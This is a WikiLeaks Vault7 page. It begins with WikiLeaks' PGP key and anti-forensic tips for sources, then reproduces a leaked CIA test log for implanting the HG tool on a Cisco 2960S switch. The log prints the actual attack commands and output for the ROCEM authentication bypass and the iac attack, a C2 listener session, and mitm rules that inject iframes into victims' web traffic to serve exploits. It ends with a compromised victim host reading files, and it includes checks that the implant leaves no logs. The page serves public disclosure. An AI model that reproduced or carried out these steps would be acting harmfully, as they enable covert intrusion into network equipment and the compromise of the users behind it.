This key's fingerprint is A04C 5E09 ED02 B328 03EB 6116 93ED 732E 9231 8DBA

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQQNBFUoCGgBIADFLp+QonWyK8L6SPsNrnhwgfCxCk6OUHRIHReAsgAUXegpfg0b
rsoHbeI5W9s5to/MUGwULHj59M6AvT+DS5rmrThgrND8Dt0dO+XW88bmTXHsFg9K
jgf1wUpTLq73iWnSBo1m1Z14BmvkROG6M7+vQneCXBFOyFZxWdUSQ15vdzjr4yPR
oMZjxCIFxe+QL+pNpkXd/St2b6UxiKB9HT9CXaezXrjbRgIzCeV6a5TFfcnhncpO
ve59rGK3/az7cmjd6cOFo1Iw0J63TGBxDmDTZ0H3ecQvwDnzQSbgepiqbx4VoNmH
OxpInVNv3AAluIJqN7RbPeWrkohh3EQ1j+lnYGMhBktX0gAyyYSrkAEKmaP6Kk4j
/ZNkniw5iqMBY+v/yKW4LCmtLfe32kYs5OdreUpSv5zWvgL9sZ+4962YNKtnaBK3
1hztlJ+xwhqalOCeUYgc0Clbkw+sgqFVnmw5lP4/fQNGxqCO7Tdy6pswmBZlOkmH
XXfti6hasVCjT1MhemI7KwOmz/KzZqRlzgg5ibCzftt2GBcV3a1+i357YB5/3wXE
j0vkd+SzFioqdq5Ppr+//IK3WX0jzWS3N5Lxw31q8fqfWZyKJPFbAvHlJ5ez7wKA
1iS9krDfnysv0BUHf8elizydmsrPWN944Flw1tOFjW46j4uAxSbRBp284wiFmV8N
TeQjBI8Ku8NtRDleriV3djATCg2SSNsDhNxSlOnPTM5U1bmh+Ehk8eHE3hgn9lRp
2kkpwafD9pXaqNWJMpD4Amk60L3N+yUrbFWERwncrk3DpGmdzge/tl/UBldPoOeK
p3shjXMdpSIqlwlB47Xdml3Cd8HkUz8r05xqJ4DutzT00ouP49W4jqjWU9bTuM48
LRhrOpjvp5uPu0aIyt4BZgpce5QGLwXONTRX+bsTyEFEN3EO6XLeLFJb2jhddj7O
DmluDPN9aj639E4vjGZ90Vpz4HpN7JULSzsnk+ZkEf2XnliRody3SwqyREjrEBui
9ktbd0hAeahKuwia0zHyo5+1BjXt3UHiM5fQN93GB0hkXaKUarZ99d7XciTzFtye
/MWToGTYJq9bM/qWAGO1RmYgNr+gSF/fQBzHeSbRN5tbJKz6oG4NuGCRJGB2aeXW
TIp/VdouS5I9jFLapzaQUvtdmpaeslIos7gY6TZxWO06Q7AaINgr+SBUvvrff/Nl
l2PRPYYye35MDs0b+mI5IXpjUuBC+s59gI6YlPqOHXkKFNbI3VxuYB0VJJIrGqIu
Fv2CXwy5HvR3eIOZ2jLAfsHmTEJhriPJ1sUG0qlfNOQGMIGw9jSiy/iQde1u3ZoF
so7sXlmBLck9zRMEWRJoI/mgCDEpWqLX7hTTABEBAAG0x1dpa2lMZWFrcyBFZGl0
b3JpYWwgT2ZmaWNlIEhpZ2ggU2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBLZXkgKFlv
dSBjYW4gY29udGFjdCBXaWtpTGVha3MgYXQgaHR0cDovL3dsY2hhdGMzcGp3cGxp
NXIub25pb24gYW5kIGh0dHBzOi8vd2lraWxlYWtzLm9yZy90YWxrKSA8Y29udGFj
dC11cy11c2luZy1vdXItY2hhdC1zeXN0ZW1Ad2lraWxlYWtzLm9yZz6JBD0EEwEK
ACcCGwMFCwkIBwMFFQoJCAsFFgIDAQACHgECF4AFAlb6cdIFCQOznOoACgkQk+1z
LpIxjbrlqh/7B2yBrryWhQMGFj+xr9TIj32vgUIMohq94XYqAjOnYdEGhb5u5B5p
BNowcqdFB1SOEvX7MhxGAqYocMT7zz2AkG3kpf9f7gOAG7qA1sRiB+R7mZtUr9Kv
fQSsRFPb6RNzqqB9I9wPNGhBh1YWusUPluLINwbjTMnHXeL96HgdLT+fIBa8ROmn
0fjJVoWYHG8QtsKiZ+lo2m/J4HyuJanAYPgL6isSu/1bBSwhEIehlQIfXZuS3j35
12SsO1Zj2BBdgUIrADdMAMLneTs7oc1/PwxWYQ4OTdkay2deg1g/N6YqM2N7rn1W
7A6tmuH7dfMlhcqw8bf5veyag3RpKHGcm7utDB6k/bMBDMnKazUnM2VQoi1mutHj
kTCWn/vF1RVz3XbcPH94gbKxcuBi8cjXmSWNZxEBsbirj/CNmsM32Ikm+WIhBvi3
1mWvcArC3JSUon8RRXype4ESpwEQZd6zsrbhgH4UqF56pcFT2ubnqKu4wtgOECsw
K0dHyNEiOM1lL919wWDXH9tuQXWTzGsUznktw0cJbBVY1dGxVtGZJDPqEGatvmiR
o+UmLKWyxTScBm5o3zRm3iyU10d4gka0dxsSQMl1BRD3G6b+NvnBEsV/+KCjxqLU
vhDNup1AsJ1OhyqPydj5uyiWZCxlXWQPk4p5WWrGZdBDduxiZ2FTj17hu8S4a5A4
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
J3x7gtxUMkTadELqwY6hrU8=
=BLTH
-----END PGP PUBLIC KEY BLOCK-----
		

Contact

If you need help using Tor you can contact WikiLeaks for assistance in setting it up using our simple webchat available at: https://wikileaks.org/talk

If you can use Tor, but need to contact WikiLeaks for other reasons use our secured webchat available at http://wlchatc3pjwpli5r.onion

We recommend contacting us over Tor if you can.

Tor

Tor is an encrypted anonymising network that makes it harder to intercept internet communications, or see where communications are coming from or going to.

In order to use the WikiLeaks public submission system as detailed above you can download the Tor Browser Bundle, which is a Firefox-like browser available for Windows, Mac OS X and GNU/Linux and pre-configured to connect using the anonymising system Tor.

Tails

If you are at high risk and you have the capacity to do so, you can also access the submission system through a secure operating system called Tails. Tails is an operating system launched from a USB stick or a DVD that aim to leaves no traces when the computer is shut down after use and automatically routes your internet traffic through Tor. Tails will require you to have either a USB stick or a DVD at least 4GB big and a laptop or desktop computer.

Tips

Our submission system works hard to preserve your anonymity, but we recommend you also take some of your own precautions. Please review these basic guidelines.

1. Contact us if you have specific problems

If you have a very large submission, or a submission with a complex format, or are a high-risk source, please contact us. In our experience it is always possible to find a custom solution for even the most seemingly difficult situations.

2. What computer to use

If the computer you are uploading from could subsequently be audited in an investigation, consider using a computer that is not easily tied to you. Technical users can also use Tails to help ensure you do not leave any records of your submission on the computer.

3. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

After

1. Do not talk about your submission to others

If you have any issues talk to WikiLeaks. We are the global experts in source protection – it is a complex field. Even those who mean well often do not have the experience or expertise to advise properly. This includes other media organisations.

2. Act normal

If you are a high-risk source, avoid saying anything or doing anything after submitting which might promote suspicion. In particular, you should try to stick to your normal routine and behaviour.

3. Remove traces of your submission

If you are a high-risk source and the computer you prepared your submission on, or uploaded it from, could subsequently be audited in an investigation, we recommend that you format and dispose of the computer hard drive and any other storage media you used.

In particular, hard drives retain data after formatting which may be visible to a digital forensics team and flash media (USB sticks, memory cards and SSD drives) retain data even after a secure erasure. If you used flash media to store sensitive data, it is important to destroy the media.

If you do this and are a high-risk source you should make sure there are no traces of the clean-up, since such traces themselves may draw suspicion.

4. If you face legal action

If a legal action is brought against you as a result of your submission, there are organisations that may help you. The Courage Foundation is an international organisation dedicated to the protection of journalistic sources. You can find more details at https://www.couragefound.org.

WikiLeaks publishes documents of political or historical importance that are censored or otherwise suppressed. We specialise in strategic global publishing and large archives.

The following is the address of our secure site where you can anonymously upload your documents to WikiLeaks editors. You can only access this submissions system through Tor. (See our Tor tab for more information.) We also advise you to read our tips for sources before submitting.

wlupld3ptjvsgwqw.onion
Copy this address into your Tor browser. Advanced users, if they wish, can also add a further layer of encryption to their submission using our public PGP key.

If you cannot use Tor, or your submission is very large, or you have specific requirements, WikiLeaks provides several alternative methods. Contact us to discuss how to proceed.

Vault7: CIA Hacking Tools Revealed

Navigation: » Directory » Network Devices Branch (NDB) » Network Devices Branch » Operations/Testing » JQJHAIRPIECE


Owner: User #71467

JQJHAIRPIECE - HG Testing

HG was delivered for JQJHAIRPIECE on 8/21/2015 for the Cisco 2960S.  CONOP will be to FLXFluxwire to 192.168.3.40 and then .  Testing will be limited to performance testing and SMITE in order to provide a quick turn around for Operator. Also need to test SMITE rules that exclude an internal web server (Xetron can help GIPPLE craft these rules).

Testing summary

  • ROC-12 - EAREnterprise Archive 5471 - ROCEM set/unset does not work with flux.  This issue was fixed by Xetron in ROCEM v1.2, delivered to TR on 08/27/15
  • ROCEM regression testing included - test of set/unset feature fixed, test of complete CONOPConcealed Operation for use with HG, test ROCEM interactive session, and ad-hoc tests
  • Received exact model 2960S 8/31 and installed
  • Performance testing shows HG has little to no impact at traffic levels tested:

 

  50M no HG 50M w HG 500M no HG 500M w HG
CPU Utilization 8% 9% 8% 9%
Mem Utilization 44% 47% 44% 47%
Latency (ms) 4 4 4 3
  • Show tech analysis - fixed output in show stacks command after hg uninstall, fixed init process while HG running, don't see ipv4 security aces increase

 

 

 

Testing Notes

Information about target:

  • WS-C2960S-24PD-L (testing used WS-C2960S-24PS-L)
  • Boot loader version 12.2(55r)SE (testing used 12.2(55r)SE1)
  • IOS c2960s-universalk9-mz.122-55.SE8.bin
  • Local authentication
  • 7 interfaces up - 1,5,6,9,10,20,24
    • ports 1,5,6,10 are in VLANVirtual Local Area Network 3
    • port 20 is in VLANVirtual Local Area Network 8
    • port 24 is uplink trunk
  • MGMT IP - int vlan 10 - 192.168.10.136
  • Client mode for VTPVLAN Trunk Protocol domain cisco
  • VLANS configured - 1 - 12
  • Upstream  router - WS-3560G-24-TS running IOSApple operating system for small devices C3560-IPSERVICESK9-M, version 12.2(55)SE9.  (testing used WS-C3560G-24PS running IOS C3560-IPSERVICESK9-M, version 12.2(55)SE8)
  • Downstream switch - 2960

VMS used

  • Hairpiece-ICON-172.20.12.30
  • Hairpiece-Seeds-Fedora10 192.168.3.10
  • Hairpiece-Flux-192.168.3.40
  • Hairpiece-Victim - 192.168.10.11
  1. Smoke Test - Use ROCEM to throw HG via FLUX
    1. Configured Seeds traffic on Seeds VMVirtual Machine for Hairpiece network and started ARP, DNSDomain Name System and HTTPSHypertext Transfer Protocol Secure seeds traffic
    2. Successfully established FLUX connection from Hairpiece-Icon to hairpiece-Flux at 192.168.3.40.
    3. Sucessfully established rocem interactive mode via flux
    4. Set rocem
    5. Could not set/unset rocem through flux, but tried outside of flux and it works fine. For purposes of smoke testing, continuing without flux.
    6. Set rocem outside of flux
    7. Attacked with iac

      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1h/attack/linux# ./iac --ip 192.168.10.136 --l cisco:test test
      LG
      EC -125
      DH
      EC -159
      M
      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1h/attack/linux#

    8. Installed HG with remote:

      GOOD - status OK.
      OP: RUNCODE using Per Second
      Code address: 0x044efd34
      No data
      Result: 0x00000001

    9. Established CTCounter Terrorism session on port 444 since flux was using port 443.  Used Seeds host as IP to trigger.

      > ilm listen hairpiece-1h.txt

      Listening for clients on port 444...
      Accepted connection from 192.168.3.10:15890
      Attempting SSLSecure Socket Layer Handshake...
      SSL Handshake Successful!
      [Success]
      New Key: lMzoTDqJUimWHf*yOQXqdzvFrk*LgsOzKIqu8blZt98=
      ************ Success ************
      [ilm listen hairpiece-1h.txt]

      [192.168.3.10]>

    10. Created mitm rule:

      [192.168.3.10]> mitm create http_iframe 192.168.10.11 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk
      [Pending]
      Job: 136300776
      ************ Pending ************
      [mitm create http_iframe 192.168.10.11 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ -en -bc -bk]

      [192.168.3.10]> [Success]

    11. Web browsed from Victim and received iframe:
      <body><iframe src="http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ

    12. Uninstalled HG:

      [192.168.3.10]> device uninstall_hg -f

      Warning!!!
      This command will remove all capabilities.
      If installed, EVExecution Vector capabilities will be wiped, but MAY LEAVE BEHIND ARTIFACTS
      Memory permissions will not be reset. See Operational Use Notes for more information.
      This connection will be terminated as a result of this command.

      Do you wish to continue?
      Enter yes or no: yes

      [Success]
      ************ Success ************
      [device uninstall_hg -f]

      [192.168.3.10]> [Remote Failure]
      ************ Remote Failure ************
      Connection to device lost!!

  2. Characterization of ROCEM issues with Flux - ROC-12
    1. Collected wiresharks of failed set attempts and successful interactive attempts from flux, icon, and rocem log files and sent all to Xetron.
    2. Tried using -c flag to change chunk size in ROCEM and tried every size in increments of 50 between 100 and 1500 - ROCEM still would not set through flux.
    3. Tried building a flux node with mtu set to 1500 - no luck, ROCEM would not work.
    4. Tried using a different flux node, from CMNCaiman (Codename)? testing, at 172.20.19.11 to attempt to flux from outside the network - no difference, rocem would not set.
  3. IXIA performance test - Baseline - no HG
    1. Reloaded DUTDevice Under Test to start with a clean configuration
    2. Set up IXIA test to run on clean device using Hairpiece NN and the following test parameters:
      1. 50M of constant traffic
      2. 50 internal hosts
      3. 50 upstream hosts
      4. 4 hour test kicked off at 11:40
    3. Test complete, saved solarwinds grapsh of CPU, MEM and latency.  No alarming spikes, switch was not stressed with this amount of traffic.
    4. Saved test report to share as well.
  4. IXIA performance test - Repeat test 3 but with HG installed
    1. Reload DUTDevice Under Test to start with a clean device
    2. Set ROCEM without using flux
    3. Attacked with IACInternational Access Code and uploaded HG
    4. Established CTCounter Terrorism session
    5. Kicked off IXIA test at 4:30 PM
    6. Collected output including report and solarwinds and saved to share.  Basically no impact when HG added at 50M of traffic.
  5. IXIA performance test - Higher stress - 500M test - no HG
    1. Reload DUTDevice Under Test to start with a clean device
    2. Setup IXIA to run with same parameters as Test 3, except 500M of traffic - Kicked off at 4:20
    3. Collected Report and solarwinds graphs
  6. IXIA performance test - Repeat test 5 but with HG installed
    1. Reload DUTDevice Under Test to start with a clean device
    2. Set ROCEM without using flux
    3. Attack with IACInternational Access Code and upload HG
    4. Establish CTCounter Terrorism session
    5. Kick off IXIA test at 500M at 9:20 AM
  7. Received ROCEM on 8/27/15 and began tests for fix to flux
    1. Loaded new ROCEM v1.2 delivery to ICON workstation
    2. Established flux connection from ICON to 192.168.3.40
    3. Used ROCEM set command - successful:

      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./rocem_c2960s-universalk9-mz.122-55.SE8.py -s -f fill.bin 192.168.10.136
      [+] Validating data/interactive.bin
      [+] Validating data/set.bin
      [+] Validating data/transfer.bin
      [+] Validating data/unset.bin

      ****************************************
      Image: c2960s-universalk9-mz.122-55.SE8
      Host: 192.168.10.136
      Action: Set
      ****************************************

      Proceed? (y/n)y
      [*] Attempting connection to host 192.168.10.136:23
      [+] Connection established
      [*] Sending Protocol Step 1
      [*] Sending Protocol Step 2
      [+] Done

    4. Telnetted to cisco and was not prompted for creds

    5. Unset ROCEM successfully:

      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./rocem_c2960s-universalk9-mz.122-55.SE8.py -u -f fill.bin 192.168.10.136
      [+] Validating data/interactive.bin
      [+] Validating data/set.bin
      [+] Validating data/transfer.bin
      [+] Validating data/unset.bin

      ****************************************
      Image: c2960s-universalk9-mz.122-55.SE8
      Host: 192.168.10.136
      Action: Unset
      ****************************************

      Proceed? (y/n)y
      [*] Attempting connection to host 192.168.10.136:23
      [+] Connection established
      [*] Sending Protocol Step 1
      [*] Sending Protocol Step 2
      [+] Done

    6. Telnetted to device and was now prompted for creds again, indicating successful unset.

  8. Smoke test of complete CONOPConcealed Operation through flux
    1. Reloaded DUTDevice Under Test to start with a clean device\
    2. Establish Flux tunne
    3. Set ROCEM, IACInternational Access Code attack and upload HG
    4. Unset ROCEM
    5. Establish HG Comms on port 444
    6. Rebuilt Flux to use 8443 on ICON box so that HG can call back to 443.
    7. Established CTCounter Terrorism session with HG
    8. Created SMITE rule:

      mitm create http_iframe 192.168.10.0 255.255.255.0 0 0 0.0.0.0 0.0.0.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk

    9. Successfully exploited Windex victim with iframe, to both coverweb and google:

      INFO: CMD >> cat secrets.txt
      ====== C:\Documents and Settings\Loki Lab\Desktop\secrets.txt
      INFO: ====== C:\Documents and Settings\Loki Lab\Desktop\secrets.txt
      This is where we keep the double top secret info.
      INFO: This is where we keep the double top secret info.
      ST2 sess[ 486] >

  9. Test SMITE rule counter
    1. [192.168.3.10]> mitm create http_iframe 192.168.10.0 255.255.255.0 0 0 0.0.0.0 0.0.0.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -ac 5 -sm 10 -en -bc -bk

    2. Created rule above to test for setting max sessions affected per host to 5 and overall max sessions to 10

    3. Browsed from Windex victim 5x and rx iframe 5x successfully.
    4. Confirmed that after the 5th iframe, further web browsing sessions from the windex victim were not injected.  Sessions remaining listed as 5.
    5. Attempted to browse from Seeds host to confirm no iframe injected for hosts on vlan 3 - did not receive iframe
    6. Browsed from Windex victim 2 and did rx iframe 5 more times, after fifth time, HG reported no sessions remaining and I received no further iframes.
    7. Deleted mitm rule
    8. Did not record any CPU spikes during mitm rules firing
  10. Test FilterBroker module stop, start
    1. Turned on 50M of IXIA traffic, enterprise profile
    2. Confirmed FilterBroker module running with module show:
      FilterBroker       22               Yes  Running  0x47d5c54   default:FilterBroker.mod
    3. stopped module
    4. [192.168.3.10]> module stop FilterBroker
      [Success]
      ************ Success ************
      [module stop FilterBroker]

      [192.168.3.10]>

    5. FilterBroker       22               Yes  Stopped  0x47d5c54   default:FilterBroker.mod  
    6. Started filterbroker

      [192.168.3.10]> module start FilterBroker.mod
      [Success]
      ************ Success ************
      [module start FilterBroker.mod]

      [192.168.3.10]>

    7. Did an ilm refresh, then module show:
      FilterBroker       22               Yes  Running  0x4393d44   default:FilterBroker.mod

    8. Created a new mitm rule - rule successfully created with ID 5
    9. Deleted rule 5
  11. Test uninstall of HG
    1. IXIA traffic running
    2. uninstalled HG with device uninstall_hg -f

      [192.168.3.10]> device uninstall_hg -f

      Warning!!!
      This command will remove all capabilities.
      If installed, EVExecution Vector capabilities will be wiped, but MAY LEAVE BEHIND ARTIFACTS
      Memory permissions will not be reset. See Operational Use Notes for more information.
      This connection will be terminated as a result of this command.

      Do you wish to continue?
      Enter yes or no: yes

      [Success]
      ************ Success ************
      [device uninstall_hg -f]

      [192.168.3.10]> [Remote Failure]
      ************ Remote Failure ************
      Connection to device lost!!
      >




    3. No log messages recevied on console

  12. Test ROCEM v1.2 set and unset - ./rocem_c2960s-universalk9-mz.122-55.SE8.py -s -f fill.bin 192.168.10.136
    1. With IXIA traffic running, testing multiple ROCEM set/unsets via flux
    2. Completed 10 rounds of ROCEM set/unset and between each command verified expected behavior on login to switch
    3. Tried setting ROCEM 5 times in a row - no issues, ROCEM output looks the same each time, no log messages to DUTDevice Under Test console or CPU spikes
    4. Tried unsetting ROCEM 5 times in a row - no issues, ROCEM output looks the same each time, no log messages to DUTDevice Under Test console or CPU spikes
  13. Test ROCEM interactive session
    1. Establish IXIA traffic - 50M
    2. Verified Flux still active
    3. Telnet to device to ensure I am challenged for creds - login and rx expected priv level
    4. Establish ROCEM interactive session:
      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./rocem_c2960s-universalk9-mz.122-55.SE8.py -i 192.168.10.136
    5. Execute device survey commands - show run, show arp, show users (shows telnet session from flux ip with no user as expected), show ip int br, show log, show vlan, show version
    6. Established a non-ROCEM telnet session while ROCEM interactive session active - was challenged for creds and rx expected priv level.  
    7. Exited ROCEM interactive session:

      SW-06# exit
      Connection closed by foreign host.
      [+] Unsetting
      [*] Attempting connection to host 192.168.10.136:23
      [+] Connection established
      [*] Sending Protocol Step 1
      [*] Sending Protocol Step 2
      [+] Done
      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem#

    8. Telneted back into switch with non-ROCEM user and rx expected challenge for creds and priv level.

    9. no syslogs generated during this session
    10. commands run during ROCEM session are not in show history (show history all is not available on this device)
    11. no spikes in CPU observed during ROCEM interactive session
  14. Ad hoc - Test ROCEM when non-ROCEM user at Username prompt (with 50M IXIA traffic)
    1. Established a telnet session to device and left it at the Username: prompt
    2. Estalished ROCEM interactive session from ICON
    3. Went back to telnet session and logged in - rx expected priv level
    4. Exited ROCEM interactive session
    5. Exited telnet session
    6. Established a telnet session to device and left it at the Username: prompt
    7. Set ROCEM from ICON
    8. Went back to telnet sesion and logged in - rx expected priv level
    9. Unset ROCEM from ICON
    10. Exited the telnet session
    11. Re-telneted to device and rx expected priv level
    12. No CPU spikes or log messages observed during this test
  15. Ad-hoc - Test ROCEM when non-ROCEM user at Password: prompt (with IXIA 50M traffic)
    1. Established a telnet session to device and entered username but left it at the Password: prompt
    2. Established ROCEM interactive session from ICON
    3. Went back to telnet session and logged in - rx expected priv level
    4. Exited telnet session
    5. Exited ROCEM interactive session
    6. Established a telnet session to device and entered username but left it at the Password: prompt
    7. Set ROCEM
    8. Went back to telnet session and logged in - rx expected priv level and password challenge
    9. Established a new telnet session in another window to device and as expected got credless priv 15
    10. exited new telnet session
    11. Exited telnet session
    12. Unset ROCEM
    13. No messages logged or syslogs generated
  16. Ad-hoc - Test ROCEM configuration changes (with IXIA traffic)
    1. Establish ROCEM interactive session 
    2. Change interface description
    3. Exit interactive ROCEM session
    4. Interface changes were logged, no user reported:
      *Mar  3 17:56:03.580: %SYS-5-CONFIG_I: Configured from console by vty0 (192.168.3.40)
  17. Test CONOPConcealed Operation again after set/usets, with IXIA traffic
    1. IXIA traffic running, flx tunnel up
    2. Set ROCEM 
    3. root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./rocem_c2960s-universalk9-mz.122-55.SE8.py -s 192.168.10.136
      [+] Validating data/interactive.bin
      [+] Validating data/set.bin
      [+] Validating data/transfer.bin
      [+] Validating data/unset.bin

      ****************************************
      Image: c2960s-universalk9-mz.122-55.SE8
      Host: 192.168.10.136

      Proceed? (y/n)y  
      [*] Attempting connection to host 192.168.10.136:23
      [+] Connection established
      [*] Sending Protocol Step 1
      [*] Sending Protocol Step 2
      [+] Done

      Action: Set
      ****************************************

    4. IAC attack - observed usual high 30s % CPU spike during attack - 

      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1h/attack/linux# ./iac --ip 192.168.10.136 --l cisco:test test
      LG
      EC -125
      DH
      EC -159
      M

    5. Unset ROCEM

      root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./rocem_c2960s-universalk9-mz.122-55.SE8.py -u 192.168.10.136
      [+] Validating data/interactive.bin
      [+] Validating data/set.bin
      [+] Validating data/transfer.bin
      [+] Validating data/unset.bin

      ****************************************
